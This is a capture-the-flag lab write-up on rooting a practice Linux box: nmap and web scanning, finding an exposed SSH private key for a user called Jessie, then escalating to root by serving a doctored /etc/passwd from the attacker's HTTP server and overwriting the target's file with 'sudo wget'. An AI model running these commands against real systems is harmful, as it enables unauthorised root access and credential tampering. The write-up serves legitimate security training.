#Linux #Wget
NMAP Scan
nmap -sV -sC -p- 10.10.207.235
- To see the versions of the services running (-sV)
- To perform a script scan using the default set of scripts (-sC)
- To scan all ports from 1 through 65535 (-p-)
OPEN PORTS
- 22/tcp ssh
- 80/tcp http
Interesting info: A person named Jessie is mentioned in the website source code:
Let's try Nikto for vulnerability scanning.
Nikto is an open source web server and web application scanner. Nikto can perform comprehensive tests against web servers for multiple security threats, including over 6700 potentially dangerous files/programs. Nikto can also perform checks for outdated web servers software, and version-specific problems. Here are some of the commonly used commands:
Nikto results reveal that the Apache server is outdated -v 2.4.18
A searchsploit analysis confirms an existing vulnerability on the Apache server.
Details of the CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation are summarized in the following link:
https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html
Gobuster search suggests a hidden directory /sitemap (Status 301)
A further Gobuster search on http://10.10.207.235/sitemap
suggests a hidden /.ssh directory hosting a private key!
What we need to do now are:
- Change file permissions for the id_rsa as
chmod 600 jessie_id_rsa
- Login ssh using the private key:
ssh -i path/to/key_file username@remote_host
We can assume that the private keys belongs to Jessie -- This name was mentioned in a comment line in website source code (see above)
We now have the user flag captured, let's explore the vulnerabilities for privilege escalation, let's try sudo -l
to see the allowed commands
It seems that we can use GTFOBins Wget vulnerability as explained here: https://gtfobins.github.io/gtfobins/wget/
Here are steps that can be followed:
- Copy
etc/passwd
in the local host, generate a password for the root account, and include it as password hash in passwd:
-
Open an HTTP server on the local host:
sudo python3 -m http.server 80
-
Transfer the passwd to target machine:
sudo wget http://10.18.123.93/passwd -O /etc/passwd
- Elevate to root:
su root
-- Password above